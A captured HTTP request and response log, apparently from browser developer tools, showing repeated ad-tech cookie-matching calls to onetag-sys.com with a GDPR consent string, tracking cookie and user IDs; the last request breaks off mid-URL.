https://onetag-sys.com/match/?gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&int_id=168&uid=OPU2a8cd869b70c43809d7b4b50942554c6

Request

GET /match/?gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&int_id=168&uid=OPU2a8cd869b70c43809d7b4b50942554c6 HTTP/2.0
host: onetag-sys.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://onetag-sys.com/
cookie: OTP=97BuMkGTmKHAMYSzHR2ANvmtkbD_ifxHzAGg5KC4gxA
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 200

cache-control: no-transform, no-cache
p3p: CP='CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR'
set-cookie: OTP=97BuMkGTmKHAMYSzHR2ANvmtkbD_ifxHzAGg5KC4gxA; path=/; expires=Wed, 25 Jun 2025 18:25:14; domain=onetag-sys.com; SameSite=None; Secure;
content-length: 0
strict-transport-security: max-age=15552000
alt-svc: h3=":443"; ma=900, h3-29=":443"; ma=900
GET

https://onetag-sys.com/match/?int_id=98&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&uid=0

Request

GET /match/?int_id=98&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&uid=0 HTTP/2.0
host: onetag-sys.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://onetag-sys.com/
cookie: OTP=97BuMkGTmKHAMYSzHR2ANvmtkbD_ifxHzAGg5KC4gxA
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 200

cache-control: no-transform, no-cache
p3p: CP='CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR'
set-cookie: OTP=97BuMkGTmKHAMYSzHR2ANvmtkbD_ifxHzAGg5KC4gxA; path=/; expires=Wed, 25 Jun 2025 18:25:16; domain=onetag-sys.com; SameSite=None; Secure;
content-length: 0
strict-transport-security: max-age=15552000
alt-svc: h3=":443"; ma=900, h3-29=":443"; ma=900
GET

https://onetag-sys.com/match/?int_id=1&uid=c9cf6652-9942-4300-8f14-6764bf037dcb&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA

Request

GET /match/?int_id=1&uid=c9cf6652-9942-4300-8f14-6764bf037dcb&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA HTTP/2.0
host: onetag-sys.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://onetag-sys.com/
cookie: OTP=97BuMkGTmKHAMYSzHR2ANvmtkbD_ifxHzAGg5KC4gxA
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 200

cache-control: no-transform, no-cache
p3p: CP='CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR'
set-cookie: OTP=97BuMkGTmKHAMYSzHR2ANvmtkbD_ifxHzAGg5KC4gxA; path=/; expires=Wed, 25 Jun 2025 18:25:17; domain=onetag-sys.com; SameSite=None; Secure;
content-length: 0
strict-transport-security: max-age=15552000
alt-svc: h3=":443"; ma=900, h3-29=":443"; ma=900
GET

https://onetag-sys.com/match/?int_id=106&google_error=3&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA

Request

GET /match/?int_id=106&google_error=3&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA HTTP/2.0
host: onetag-sys.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://onetag-sys.com/
cookie: OTP=97BuMkGTmKHAMYSzHR2ANvmtkbD_ifxHzAGg5KC4gxA
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 200

cache-control: no-transform, no-cache
p3p: CP='CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR'
set-cookie: OTP=97BuMkGTmKHAMYSzHR2ANvmtkbD_ifxHzAGg5KC4gxA; path=/; expires=Wed, 25 Jun 2025 18:25:17; domain=onetag-sys.com; SameSite=None; Secure;
content-length: 0
strict-transport-security: max-age=15552000
alt-svc: h3=":443"; ma=900, h3-29=":443"; ma=900
GET

https://onetag-sys.com/match/?int_id=19&google_error=3&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA